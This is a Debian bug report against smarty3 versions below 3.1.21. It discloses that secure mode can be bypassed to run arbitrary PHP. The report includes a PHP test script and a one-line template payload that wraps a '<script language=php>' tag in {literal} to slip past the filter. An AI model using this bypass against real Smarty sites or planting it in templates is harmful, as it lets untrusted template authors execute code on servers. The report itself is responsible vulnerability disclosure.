Package: smarty3
Version: All below 3.1.21
Severity: important
Smarty secure mode should allow untrusted users to write templates,
without allowing them to execute arbitrary PHP code. However, all
smarty3 versions in Debian (sid, Jessie, stable, oldstable) currently
has a security hole allowing arbitrary PHP code execution if you can
edit templates.
Example:
test.php:
<?php
require_once('/home/thue/smarty/libs/SmartyBC.class.php');
$smarty = new Smarty();
$smarty->setTemplateDir('templates/');
$smarty->setCompileDir('templates_c/');
$smarty->enableSecurity();
$smarty->force_compile = true;
$tpl = $smarty->createTemplate('test.tpl');
$tpl->compileTemplateSource();
$smarty->display('test.tpl');
?>
templates/test.tpl:
{literal}<{/literal}script language=php>echo 1+1;</script>
If secure mode worked, that should output
<script language=php>echo 1+1;</script>
In smarty3<3.1.21 it outputs
2
Regards, Thue
-- System Information:
Debian Release: 7.6
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
